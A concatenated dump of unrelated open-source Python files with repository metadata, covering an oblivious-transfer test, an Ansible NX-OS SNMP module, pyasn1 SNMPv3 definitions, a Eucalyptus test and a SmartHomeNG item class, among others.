def setUp(self):
state.config = config.create_configuration(security_level="short", asymmetric_security_parameter=1024, symmetric_security_parameter=80, ot_type = "EC", host="::1", port=8000, protocol_dir="docs/millionaires_problem/")
state.config.ot_chain = [PaillierOT]
def test_tastyot(self):
""" testing the global TastyOT """
# state.config.ot_chain = [paillierot.PaillierOT]
n = 128 # must be even
self.ot = t = OTTest(n)
x = tuple(utils.get_random(0,1,n/2))
y = tuple(utils.get_random(0,1,n/2))
xc = [tuple(utils.get_random(0,2**80-1,2)) for i in xrange(n/2)]
yc = [tuple(utils.get_random(0,2**80-1,2)) for i in xrange(n/2)]
resultx = tuple(map(lambda x: mpz(x[0][x[1]]), zip(xc, x)))
resulty = tuple(map(lambda x: mpz(x[0][x[1]]), zip(yc, y)))
res = t.next_ots(x, xc)[1]
self.assertEqual(res, resultx)
res2 = t.next_ots(y, yc)[1]
self.assertEqual(res2, resulty)
# self.failUnlessRaises(OverflowError, t.next_ots, t, ((1,),(5,7)))
def test_ot_protocol_performance(self):
""" testing available OT protocols """
# for security_level, ot_type in product(("short","medium","long"), ("Paillier","EC_c","EC")):
for security_level, ot_type in product(("short","medium","long"), ("EC_c","EC")):
print security_level, ot_type,
start_time = time.clock()
#protocols = [ECNaorPinkasOT.NP_EC_OT_secp192r1, ECNaorPinkasOT.NP_EC_OT_secp192r1_c, \
# ECNaorPinkasOT.NP_EC_OT_secp224r1, ECNaorPinkasOT.NP_EC_OT_secp224r1_c, \
# ECNaorPinkasOT.NP_EC_OT_secp256r1, ECNaorPinkasOT.NP_EC_OT_secp256r1_c]
#protocols = state.config.ot_chain
n = state.config.symmetric_security_parameter
# for prot in protocols:
# print prot.__name__
# state.config.ot_chain = [prot]
self.ot = t = OTTest(n)
x = tuple(utils.get_random(0,1,n/2))
y = tuple(utils.get_random(0,1,n/2))
xc = [tuple(utils.get_random(0,2**n-1,2)) for i in xrange(n/2)] # n-bit messages
yc = [tuple(utils.get_random(0,2**n-1,2)) for i in xrange(n/2)] # n-bit messages
resultx = tuple(map(lambda x: mpz(x[0][x[1]]), zip(xc, x)))
resulty = tuple(map(lambda x: mpz(x[0][x[1]]), zip(yc, y)))
res = t.next_ots(x, xc)[1]
self.assertEqual(res, resultx)
res2 = t.next_ots(y, yc)[1]
self.assertEqual(res2, resulty)
print "%fs" % (time.clock()-start_time)
class OTTest(object):
#TODO: @Immo: please document how OTTest works
def __init__(self, num):
self.num = num
p = Process(target=OTTest.client,
args=(self, num))
p.start()
self.init_server()
atexit.register(self.__del__)
def next_ots(self, choices, transfer):
# debug ("starting online phase")
self.csock.sendobj("online")
self.csock.sendobj(choices)
sres = self.server_online(transfer)
cres = self.csock.recvobj()
return (sres, cres)
def init_client(self):
sleep(.1) #give the server time to set up
sock = ClientObjectSocket(host="::1", port=8000)
sleep(.1)
self.csock = ClientObjectSocket(host="::1", port=8001)
self.party = Party(role=Party.CLIENT, sock=sock)
def client(self, num):
self.init_client()
self.ot = TastyOT(self.party, num)
while True:
next = self.csock.recvobj()
# debug ("executing command %s"%next)
if next == "online":
self.client_online(self.csock.recvobj())
elif next == "quit":
exit(0)
else:
raise NotImplementedError(next)
def init_server(self):
sock = ServerObjectSocket(host="::1", port=8000).accept()[0]
self.csock = ServerObjectSocket(host="::1", port=8001).accept()[0]
self.party = party = Party(role=Party.SERVER, sock=sock)
self.ot = TastyOT(self.party, self.num)
def client_online(self, arg):
self.csock.sendobj(self.ot.next_ots(arg))
def server_online(self, arg):
self.ot.next_ots(arg)
def __del__(self):
try:
self.csock.sendobj("quit")
self.csock.close()
except socket.error: #server side has already exited
pass
def suite():
suite = unittest.TestSuite()
# suite.addTest(TastyOTTestCase("test_tastyot"))
suite.addTest(TastyOTTestCase("test_ot_protocol_performance"))
return suite
if __name__ == '__main__':
unittest.TextTestRunner(verbosity=2).run(suite())
| gpl-3.0 |
verifiedpixel/superdesk | server/apps/highlights/resource.py | 3 | 1247 |
from superdesk.resource import Resource
TODAY_DATE = 'now/d'
WEEK_DATE = 'now/w'
allowed_times = ['now-{0}h'.format(hour) for hour in range(1, 25)]
allowed_times.append(TODAY_DATE)
allowed_times.append(WEEK_DATE)
class HighlightsResource(Resource):
'''
Highlights schema
'''
schema = {
'name': {
'type': 'string',
'iunique': True,
'required': True
},
'desks': {
'type': 'list',
'schema': Resource.rel('desks', True)
},
'auto_insert': {
'type': 'string',
'allowed': allowed_times,
'default': TODAY_DATE,
},
'groups': {
'type': 'list',
'schema': {
'type': 'string'
}
}
}
privileges = {'POST': 'highlights', 'PATCH': 'highlights', 'DELETE': 'highlights'}
class MarkedForHighlightsResource(Resource):
'''
Marked for highlights Schema
'''
schema = {
'highlights': {
'type': 'string',
'required': True
},
'marked_item': {
'type': 'string',
'required': True
}
}
privileges = {'POST': 'mark_for_highlights'}
| agpl-3.0 |
joshua-cogliati-inl/moose | gui/vtk/ExodusRenderer.py | 34 | 4695 | import os, sys, getopt
try:
from PyQt4 import QtCore, QtGui
QtCore.Signal = QtCore.pyqtSignal
QtCore.Slot = QtCore.pyqtSlot
except ImportError:
try:
from PySide import QtCore, QtGui
QtCore.QString = str
except ImportError:
raise ImportError("Cannot load either PyQt or PySide")
import vtk
from vtk.util.colors import peacock, tomato, red, white, black
from ExodusActor import ExodusActor
from ClippedActor import ClippedActor
from MeshRenderer import MeshRenderer
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class ExodusMap:
# These are the blocks from the multiblockdataset that correspond to each item
element_vtk_block = 0
sideset_vtk_block = 4
nodeset_vtk_block = 7
class ExodusRenderer(MeshRenderer):
def __init__(self, render_widget, mesh_item_data):
MeshRenderer.__init__(self, render_widget, mesh_item_data)
self.file_name = mesh_item_data['file']
self.buildActors(self.file_name)
def buildActors(self, file_name):
reader = vtk.vtkExodusIIReader()
reader.SetFileName(self.file_name)
reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODAL, 1)
reader.SetAllArrayStatus(vtk.vtkExodusIIReader.EDGE_SET, 1)
reader.SetAllArrayStatus(vtk.vtkExodusIIReader.SIDE_SET, 1)
reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODE_SET, 1)
reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODAL_TEMPORAL, 1)
reader.UpdateInformation()
reader.SetObjectStatus(vtk.vtkExodusIIReader.NODE_SET, 0, 1)
num_sidesets = reader.GetNumberOfSideSetArrays()
num_nodesets = reader.GetNumberOfNodeSetArrays()
num_blocks = reader.GetNumberOfElementBlockArrays()
self.sidesets = []
self.sideset_id_to_exodus_block = {}
self.sideset_id_to_name = {}
self.name_to_sideset_id = {}
for i in xrange(num_sidesets):
sideset_id = reader.GetObjectId(vtk.vtkExodusIIReader.SIDE_SET,i)
self.sidesets.append(sideset_id)
self.sideset_id_to_exodus_block[sideset_id] = i
reader.SetObjectStatus(vtk.vtkExodusIIReader.SIDE_SET, i, 1)
name = reader.GetObjectName(vtk.vtkExodusIIReader.SIDE_SET,i).split(' ')
if 'Unnamed' not in name:
self.sideset_id_to_name[sideset_id] = name[0]
self.name_to_sideset_id[name[0]] = sideset_id
self.nodesets = []
self.nodeset_id_to_exodus_block = {}
self.nodeset_id_to_name = {}
self.name_to_nodeset_id = {}
for i in xrange(num_nodesets):
nodeset_id = reader.GetObjectId(vtk.vtkExodusIIReader.NODE_SET,i)
self.nodesets.append(nodeset_id)
self.nodeset_id_to_exodus_block[nodeset_id] = i
reader.SetObjectStatus(vtk.vtkExodusIIReader.NODE_SET, i, 1)
name = reader.GetObjectName(vtk.vtkExodusIIReader.NODE_SET,i).split(' ')
if 'Unnamed' not in name:
self.nodeset_id_to_name[nodeset_id] = name[0]
self.name_to_nodeset_id[name[0]] = nodeset_id
self.blocks = []
self.block_id_to_exodus_block = {}
self.block_id_to_name = {}
self.name_to_block_id = {}
for i in xrange(num_blocks):
block_id = reader.GetObjectId(vtk.vtkExodusIIReader.ELEM_BLOCK,i)
self.blocks.append(block_id)
self.block_id_to_exodus_block[block_id] = i
name = reader.GetObjectName(vtk.vtkExodusIIReader.ELEM_BLOCK,i).split(' ')
if 'Unnamed' not in name:
self.block_id_to_name[block_id] = name[0]
self.name_to_block_id[name[0]] = block_id
reader.SetTimeStep(1)
reader.Update()
self.data = reader.GetOutput()
for i in xrange(num_sidesets):
actor = ExodusActor(self.renderer, self.data, ExodusMap.sideset_vtk_block, i)
self.sideset_actors[str(self.sidesets[i])] = actor
self.all_actors.append(actor)
clipped_actor = ClippedActor(actor, self.plane)
self.clipped_sideset_actors[str(self.sidesets[i])] = clipped_actor
self.all_actors.append(clipped_actor)
for i in xrange(num_nodesets):
actor = ExodusActor(self.renderer, self.data, ExodusMap.nodeset_vtk_block, i)
self.nodeset_actors[str(self.nodesets[i])] = actor
self.all_actors.append(actor)
clipped_actor = ClippedActor(actor, self.plane)
self.clipped_nodeset_actors[str(self.nodesets[i])] = clipped_actor
self.all_actors.append(clipped_actor)
for i in xrange(num_blocks):
actor = ExodusActor(self.renderer, self.data, ExodusMap.element_vtk_block, i)
self.block_actors[str(self.blocks[i])] = actor
self.all_actors.append(actor)
clipped_actor = ClippedActor(actor, self.plane)
self.clipped_block_actors[str(self.blocks[i])] = clipped_actor
self.all_actors.append(clipped_actor)
| lgpl-2.1 |
gwq5210/litlib | thirdparty/sources/boost_1_60_0/libs/python/test/virtual_functions.py | 46 | 1803 | # Copyright David Abrahams 2004. Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
'''
>>> from virtual_functions_ext import *
>>> class C1(concrete):
... def f(self, y):
... return concrete.f(self, Y(-y.value()))
>>> class C2(concrete):
... pass
>>> class A1(abstract):
... def f(self, y):
... return y.value() * 2
... def g(self, y):
... return self
>>> class A2(abstract):
... pass
>>> y1 = Y(16)
>>> y2 = Y(17)
#
# Test abstract with f,g overridden
#
>>> a1 = A1(42)
>>> a1.value()
42
# Call f,g indirectly from C++
>>> a1.call_f(y1)
32
>>> assert type(a1.call_g(y1)) is abstract
# Call f directly from Python
>>> a1.f(y2)
34
#
# Test abstract with f not overridden
#
>>> a2 = A2(42)
>>> a2.value()
42
# Call f indirectly from C++
>>> try: a2.call_f(y1)
... except AttributeError: pass
... else: print 'no exception'
# Call f directly from Python
>>> try: a2.call_f(y2)
... except AttributeError: pass
... else: print 'no exception'
############# Concrete Tests ############
#
# Test concrete with f overridden
#
>>> c1 = C1(42)
>>> c1.value()
42
# Call f indirectly from C++
>>> c1.call_f(y1)
-16
# Call f directly from Python
>>> c1.f(y2)
-17
#
# Test concrete with f not overridden
#
>>> c2 = C2(42)
>>> c2.value()
42
# Call f indirectly from C++
>>> c2.call_f(y1)
16
# Call f directly from Python
>>> c2.f(y2)
17
'''
def run(args = None):
import sys
import doctest
if args is not None:
sys.argv = args
return doctest.testmod(sys.modules.get(__name__))
if __name__ == '__main__':
print "running..."
import sys
status = run()[0]
if (status == 0): print "Done."
sys.exit(status)
| gpl-3.0 |
drmrd/ansible | lib/ansible/modules/network/nxos/nxos_snmp_community.py | 77 | 6703 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_snmp_community
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages SNMP community configs.
description:
- Manages SNMP community configuration.
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
options:
community:
description:
- Case-sensitive community string.
required: true
access:
description:
- Access type for community.
choices: ['ro','rw']
group:
description:
- Group to which the community belongs.
acl:
description:
- ACL name to filter snmp requests or keyword 'default'.
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# ensure snmp community is configured
- nxos_snmp_community:
community: TESTING7
group: network-operator
state: present
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["snmp-server community TESTING7 group network-operator"]
'''
import re
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
def execute_show_command(command, module):
if 'show run' not in command:
output = 'json'
else:
output = 'text'
cmds = [{
'command': command,
'output': output,
}]
body = run_commands(module, cmds)
return body
def flatten_list(command_lists):
flat_command_list = []
for command in command_lists:
if isinstance(command, list):
flat_command_list.extend(command)
else:
flat_command_list.append(command)
return flat_command_list
def get_snmp_groups(module):
data = execute_show_command('show snmp group', module)[0]
group_list = []
try:
group_table = data['TABLE_role']['ROW_role']
for group in group_table:
group_list.append(group['role_name'])
except (KeyError, AttributeError):
pass
return group_list
def get_snmp_community(module, name):
command = 'show run snmp all | grep {0}'.format(name)
data = execute_show_command(command, module)[0]
community_dict = {}
if not data:
return community_dict
community_re = r'snmp-server community (\S+)'
mo = re.search(community_re, data)
if mo:
community_name = mo.group(1)
else:
return community_dict
community_dict['group'] = None
group_re = r'snmp-server community {0} group (\S+)'.format(community_name)
mo = re.search(group_re, data)
if mo:
community_dict['group'] = mo.group(1)
community_dict['acl'] = None
acl_re = r'snmp-server community {0} use-acl (\S+)'.format(community_name)
mo = re.search(acl_re, data)
if mo:
community_dict['acl'] = mo.group(1)
return community_dict
def config_snmp_community(delta, community):
CMDS = {
'group': 'snmp-server community {0} group {group}',
'acl': 'snmp-server community {0} use-acl {acl}',
'no_acl': 'no snmp-server community {0} use-acl {no_acl}'
}
commands = []
for k, v in delta.items():
cmd = CMDS.get(k).format(community, **delta)
if cmd:
commands.append(cmd)
cmd = None
return commands
def main():
argument_spec = dict(
community=dict(required=True, type='str'),
access=dict(choices=['ro', 'rw']),
group=dict(type='str'),
acl=dict(type='str'),
state=dict(choices=['absent', 'present'], default='present'),
)
argument_spec.update(nxos_argument_spec)
module = AnsibleModule(argument_spec=argument_spec,
required_one_of=[['access', 'group']],
mutually_exclusive=[['access', 'group']],
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
results = {'changed': False, 'commands': [], 'warnings': warnings}
access = module.params['access']
group = module.params['group']
community = module.params['community']
acl = module.params['acl']
state = module.params['state']
if access:
if access == 'ro':
group = 'network-operator'
elif access == 'rw':
group = 'network-admin'
# group check - ensure group being configured exists on the device
configured_groups = get_snmp_groups(module)
if group not in configured_groups:
module.fail_json(msg="Group not on switch. Please add before moving forward")
existing = get_snmp_community(module, community)
args = dict(group=group, acl=acl)
proposed = dict((k, v) for k, v in args.items() if v is not None)
delta = dict(set(proposed.items()).difference(existing.items()))
if delta.get('acl') == 'default':
delta.pop('acl')
if existing.get('acl'):
delta['no_acl'] = existing.get('acl')
commands = []
if state == 'absent':
if existing:
command = "no snmp-server community {0}".format(community)
commands.append(command)
elif state == 'present':
if delta:
command = config_snmp_community(dict(delta), community)
commands.append(command)
cmds = flatten_list(commands)
if cmds:
results['changed'] = True
if not module.check_mode:
load_config(module, cmds)
if 'configure' in cmds:
cmds.pop(0)
results['commands'] = cmds
module.exit_json(**results)
if __name__ == '__main__':
main()
| gpl-3.0 |
spatialaudio/sweep | log_sweep_kaiser_window_bandlimited_script5/log_sweep_kaiser_window_bandlimited_script5.py | 2 | 2156 | #!/usr/bin/env python3
"""The influence of windowing of log. bandlimited sweep signals when using a
Kaiser Window by fixing beta (=2) and fade_out (=0).
fstart = 100 Hz
fstop = 5000 Hz
"""
import sys
sys.path.append('..')
import measurement_chain
import plotting
import calculation
import ir_imitation
import generation
import matplotlib.pyplot as plt
import windows
from scipy.signal import lfilter, fftconvolve
import numpy as np
# Parameters of the measuring system
fs = 44100
fstart = 100
fstop = 5000
duration = 1
pad = 4
# Generate excitation signal
excitation = generation.log_sweep(fstart, fstop, duration, fs)
N = len(excitation)
# Noise in measurement chain
noise_level_db = -30
noise = measurement_chain.additive_noise(noise_level_db)
# FIR-Filter-System
dirac_system = measurement_chain.convolution([1.0])
# Combinate system elements
system = measurement_chain.chained(dirac_system, noise)
# Lists
beta = 7
fade_in_list = np.arange(0, 1001, 1)
fade_out = 0
# Spectrum of dirac for reference
dirac = np.zeros(pad * fs)
dirac[0] = 1
dirac_f = np.fft.rfft(dirac)
def get_results(fade_in):
excitation_windowed = excitation * windows.window_kaiser(N,
fade_in,
fade_out,
fs, beta)
excitation_windowed_zeropadded = generation.zero_padding(
excitation_windowed, pad, fs)
system_response = system(excitation_windowed_zeropadded)
ir = calculation.deconv_process(excitation_windowed_zeropadded,
system_response,
fs)
return ir
with open("log_sweep_kaiser_window_bandlimited_script5.txt", "w") as f:
for fade_in in fade_in_list:
ir = get_results(fade_in)
pnr = calculation.pnr_db(ir[0], ir[1:4 * fs])
spectrum_distance = calculation.vector_distance(
dirac_f, np.fft.rfft(ir[:pad * fs]))
f.write(
str(fade_in) + " " + str(pnr) +
" " + str(spectrum_distance) + " \n")
| mit |
Just-D/chromium-1 | tools/telemetry/third_party/gsutilz/third_party/pyasn1-modules/pyasn1_modules/rfc3412.py | 127 | 1675 | #
# SNMPv3 message syntax
#
# ASN.1 source from:
# http://www.ietf.org/rfc/rfc3412.txt
#
from pyasn1.type import univ, namedtype, namedval, tag, constraint
from pyasn1_modules import rfc1905
class ScopedPDU(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('contextEngineId', univ.OctetString()),
namedtype.NamedType('contextName', univ.OctetString()),
namedtype.NamedType('data', rfc1905.PDUs())
)
class ScopedPduData(univ.Choice):
componentType = namedtype.NamedTypes(
namedtype.NamedType('plaintext', ScopedPDU()),
namedtype.NamedType('encryptedPDU', univ.OctetString()),
)
class HeaderData(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('msgID', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(0, 2147483647))),
namedtype.NamedType('msgMaxSize', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(484, 2147483647))),
namedtype.NamedType('msgFlags', univ.OctetString().subtype(subtypeSpec=constraint.ValueSizeConstraint(1, 1))),
namedtype.NamedType('msgSecurityModel', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(1, 2147483647)))
)
class SNMPv3Message(univ.Sequence):
componentType = namedtype.NamedTypes(
namedtype.NamedType('msgVersion', univ.Integer().subtype(subtypeSpec=constraint.ValueRangeConstraint(0, 2147483647))),
namedtype.NamedType('msgGlobalData', HeaderData()),
namedtype.NamedType('msgSecurityParameters', univ.OctetString()),
namedtype.NamedType('msgData', ScopedPduData())
)
| bsd-3-clause |
abhikeshav/ydk-py | cisco-ios-xr/ydk/models/cisco_ios_xr/_meta/_Cisco_IOS_XR_ncs1k_mxp_lldp_oper.py | 1 | 3663 |
import re
import collections
from enum import Enum
from ydk._core._dm_meta_info import _MetaInfoClassMember, _MetaInfoClass, _MetaInfoEnum
from ydk.types import Empty, YList, YLeafList, DELETE, Decimal64, FixedBitsDict
from ydk._core._dm_meta_info import ATTRIBUTE, REFERENCE_CLASS, REFERENCE_LIST, REFERENCE_LEAFLIST, REFERENCE_IDENTITY_CLASS, REFERENCE_ENUM_CLASS, REFERENCE_BITS, REFERENCE_UNION
from ydk.errors import YPYError, YPYModelError
from ydk.providers._importer import _yang_ns
_meta_table = {
'LldpSnoopData.EthernetControllerNames.EthernetControllerName' : {
'meta_info' : _MetaInfoClass('LldpSnoopData.EthernetControllerNames.EthernetControllerName',
False,
[
_MetaInfoClassMember('name', ATTRIBUTE, 'str' , None, None,
[], ['(([a-zA-Z0-9_]*\\d+/){3}\\d+)|(([a-zA-Z0-9_]*\\d+/){4}\\d+)|(([a-zA-Z0-9_]*\\d+/){3}\\d+\\.\\d+)|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]*\\d+))|(([a-zA-Z0-9_]*\\d+/){2}([a-zA-Z0-9_]+))|([a-zA-Z0-9_-]*\\d+)|([a-zA-Z0-9_-]*\\d+\\.\\d+)|(mpls)|(dwdm)'],
''' Port name
''',
'name',
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper', True),
_MetaInfoClassMember('lldp-neighbor', ATTRIBUTE, 'str' , None, None,
[(0, 40)], [],
''' LldpNeighbor
''',
'lldp_neighbor',
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper', False),
],
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper',
'ethernet-controller-name',
_yang_ns._namespaces['Cisco-IOS-XR-ncs1k-mxp-lldp-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper'
),
},
'LldpSnoopData.EthernetControllerNames' : {
'meta_info' : _MetaInfoClass('LldpSnoopData.EthernetControllerNames',
False,
[
_MetaInfoClassMember('ethernet-controller-name', REFERENCE_LIST, 'EthernetControllerName' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper', 'LldpSnoopData.EthernetControllerNames.EthernetControllerName',
[], [],
''' port Name
''',
'ethernet_controller_name',
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper', False),
],
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper',
'ethernet-controller-names',
_yang_ns._namespaces['Cisco-IOS-XR-ncs1k-mxp-lldp-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper'
),
},
'LldpSnoopData' : {
'meta_info' : _MetaInfoClass('LldpSnoopData',
False,
[
_MetaInfoClassMember('ethernet-controller-names', REFERENCE_CLASS, 'EthernetControllerNames' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper', 'LldpSnoopData.EthernetControllerNames',
[], [],
''' Ethernet controller snoop data
''',
'ethernet_controller_names',
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper', False),
],
'Cisco-IOS-XR-ncs1k-mxp-lldp-oper',
'lldp-snoop-data',
_yang_ns._namespaces['Cisco-IOS-XR-ncs1k-mxp-lldp-oper'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_ncs1k_mxp_lldp_oper'
),
},
}
_meta_table['LldpSnoopData.EthernetControllerNames.EthernetControllerName']['meta_info'].parent =_meta_table['LldpSnoopData.EthernetControllerNames']['meta_info']
_meta_table['LldpSnoopData.EthernetControllerNames']['meta_info'].parent =_meta_table['LldpSnoopData']['meta_info']
| apache-2.0 |
shaon/eutester | testcases/cloud_admin/3-2/Euca3456.py | 6 | 3140 | '''
Created on Jan 31, 2013
@author: mmunn
Unit test : EUCA-3456 euca-describe-nodes does not return consistent results
setUp : Install Credentials,
test : run 24 instances on 6 nodes then call euca_conf --list-nodes and count the number of nodes listed.
tearDown : Removes Credentials, does not terminate instances
cloud.conf:( place in same directory as this test)
IP ADDRESS CENTOS 6.3 64 BZR [CC00 CLC SC00 WS]
IP ADDRESS CENTOS 6.3 64 BZR [NC01] [NC02] [NC03] [NC04] [NC05] [NC06]
'''
import unittest
import shutil
from eucaops import Eucaops
class Euca3456(unittest.TestCase):
def setUp(self):
#This bug is intermittent.
#To reproduce this consistently I used 6 nodes 24 instances and 50 iterations
#These can be adjusted, the more nodes and instances the quicker you will see the problem.
#runInstances is run twice for a total of (2 * numIntances ) this done
#to avoid out of resources error.
self.numNodes = 6
self.numIntances = 12
self.numIterations = 1
self.conf = "cloud.conf"
self.tester = Eucaops( config_file=self.conf, password="foobar" )
self.doAuth()
def tearDown(self):
#self.tester.cleanup_artifacts()
self.tester.delete_keypair(self.keypair)
self.tester.local("rm " + self.keypair.name + ".pem")
shutil.rmtree(self.tester.credpath)
def runInstances(self, numMax):
#Start instance
self.reservation = self.tester.run_instance(keypair=self.keypair.name, group=self.group, min=0, max=numMax, is_reachable=False, timeout=480)
# Make sure the instance is running
for instance in self.reservation.instances:
if instance.state == "running":
self.ip = instance.public_dns_name
self.instanceid = instance.id
def runSysCmd(self, cmd):
self.source = "source " + self.tester.credpath + "/eucarc && "
self.out = self.tester.sys(self.source + cmd)
def doAuth(self):
self.keypair = self.tester.add_keypair()
self.group = self.tester.add_group()
self.tester.authorize_group(self.group)
def testDescribeNodes(self):
self.emi = self.tester.get_emi()
self.runInstances(self.numIntances)
#self.runInstances(self.numIntances)
i = 0
while i < self.numIterations :
i += 1
self.tester.debug("Running iteration " + str(i))
self.runSysCmd("/opt/eucalyptus/usr/sbin/euca_conf --list-nodes")
#count the returned nodes
count = str(self.out).count("NODE")
if count != self.numNodes :
self.tester.debug("FAILURE only " + str(count) + " nodes listed.")
self.fail("FAIL Incorrect number of nodes listed!")
else :
self.tester.debug("SUCCESS " + str(count) + " nodes listed.")
pass
if __name__ == "__main__":
unittest.main("Euca3456")
| bsd-2-clause |
robert-budde/smarthome | lib/item_new/item.py | 2 | 55016 | #!/usr/bin/env python3
# vim: set encoding=utf-8 tabstop=4 softtabstop=4 shiftwidth=4 expandtab
#########################################################################
# Copyright 2016-2020 Martin Sinn m.sinn@gmx.de
# Copyright 2016 Christian Straßburg c.strassburg@gmx.de
# Copyright 2012-2013 Marcus Popp marcus@popp.mx
#########################################################################
# This file is part of SmartHomeNG.
#
# SmartHomeNG is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# SmartHomeNG is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with SmartHomeNG. If not, see <http://www.gnu.org/licenses/>.
#########################################################################
import logging
import datetime
import dateutil.parser
import os
import copy
import json
import threading
import time # for calls to time in eval
import math # for calls to math in eval
from math import *
from lib.plugin import Plugins
from lib.shtime import Shtime
from lib.constants import (ITEM_DEFAULTS, FOO, KEY_ENFORCE_UPDATES, KEY_ENFORCE_CHANGE, KEY_CACHE, KEY_CYCLE, KEY_CRONTAB, KEY_EVAL,
KEY_EVAL_TRIGGER, KEY_TRIGGER, KEY_CONDITION, KEY_NAME, KEY_TYPE, KEY_STRUCT,
KEY_VALUE, KEY_INITVALUE, PLUGIN_PARSE_ITEM, KEY_AUTOTIMER, KEY_ON_UPDATE, KEY_ON_CHANGE,
KEY_LOG_CHANGE, KEY_THRESHOLD,
KEY_ATTRIB_COMPAT, ATTRIB_COMPAT_V12, ATTRIB_COMPAT_LATEST)
from .property import Property
from .helpers import *
_items_instance = None
ATTRIB_COMPAT_DEFAULT_FALLBACK = ATTRIB_COMPAT_V12
ATTRIB_COMPAT_DEFAULT = ''
logger = logging.getLogger(__name__)
#####################################################################
# Item Class
#####################################################################
"""
The class ``Item`` implements the methods and attributes of an item. Each item is represented by an instance of the class ``Item``.
"""
class Item():
"""
Class from which item objects are created
The class ``Item`` implements the methods and attributes of an item. Each item is represented by an instance
of the class ``Item``. For an item to be valid and usable, it has to be part of the item tree, which is
maintained by an object of class ``Items``.
This class is used by the method ```load_itemdefinitions()`` of the **Items** object.
"""
_itemname_prefix = 'items.' # prefix for scheduler names
def __init__(self, smarthome, parent, path, config, items_instance=None):
global _items_instance
if items_instance:
_items_instance = items_instance
self._sh = smarthome
self._use_conditional_triggers = False
try:
if self._sh._use_conditional_triggers.lower() == 'true':
self._use_conditional_triggers = True
except: pass
self.plugins = Plugins.get_instance()
self.shtime = Shtime.get_instance()
self._filename = None
self._autotimer = False
self._cache = False
self.cast = cast_bool
self.__changed_by = 'Init:None'
self.__updated_by = 'Init:None'
self.__children = []
self.conf = {}
self._crontab = None
self._cycle = None
self._enforce_updates = False
self._enforce_change = False
self._eval = None # -> KEY_EVAL
self._eval_unexpanded = ''
self._eval_trigger = False
self._trigger = False
self._trigger_unexpanded = []
self._trigger_condition_raw = []
self._trigger_condition = None
self._on_update = None # -> KEY_ON_UPDATE eval expression
self._on_change = None # -> KEY_ON_CHANGE eval expression
self._on_update_dest_var = None # -> KEY_ON_UPDATE destination var
self._on_change_dest_var = None # -> KEY_ON_CHANGE destination var
self._on_update_unexpanded = [] # -> KEY_ON_UPDATE eval expression (with unexpanded item references)
self._on_change_unexpanded = [] # -> KEY_ON_CHANGE eval expression (with unexpanded item references)
self._on_update_dest_var_unexp = [] # -> KEY_ON_UPDATE destination var (with unexpanded item reference)
self._on_change_dest_var_unexp = [] # -> KEY_ON_CHANGE destination var (with unexpanded item reference)
self._log_change = None
self._log_change_logger = None
self._fading = False
self._items_to_trigger = []
self.__last_change = self.shtime.now()
self.__last_update = self.shtime.now()
self._lock = threading.Condition()
self.__logics_to_trigger = []
self._name = path
self.__prev_change = self.shtime.now()
self.__prev_update = self.shtime.now()
self.__methods_to_trigger = []
self.__parent = parent
self._path = path
self._sh = smarthome
self._threshold = False
self._threshold_data = [0,0,False]
self._type = None
self._struct = None
self._value = None
self.__last_value = None
self.__prev_value = None
self.property = Property(self)
# history
# TODO: create history Arrays for some values (value, last_change, last_update (usage: multiklick,...)
# self.__history = [None, None, None, None, None]
#
# def getValue(num):
# return (str(self.__history[(num - 1)]))
#
# def addValue(avalue):
# self.__history.append(avalue)
# if len(self.__history) > 5:
# self.__history.pop(0)
#
if hasattr(smarthome, '_item_change_log'):
self._change_logger = logger.info
else:
self._change_logger = logger.debug
#############################################################
# Initialize attribute assignment compatibility
